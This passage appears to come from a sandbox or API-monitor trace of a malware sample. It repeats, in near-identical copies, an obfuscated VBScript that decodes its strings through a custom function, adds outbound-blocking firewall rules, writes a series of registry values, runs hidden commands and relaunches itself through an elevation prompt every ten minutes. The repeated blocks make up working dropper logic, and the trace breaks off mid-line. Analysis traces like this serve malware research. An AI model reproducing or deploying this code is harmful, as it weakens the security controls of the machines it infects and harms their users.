str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0223.017] wcsncmp (_String1="DTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.017] wcsncmp (_String1="TFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.017] wcsncmp (_String1="FEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0223.017] wcsncmp (_String1="EEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute 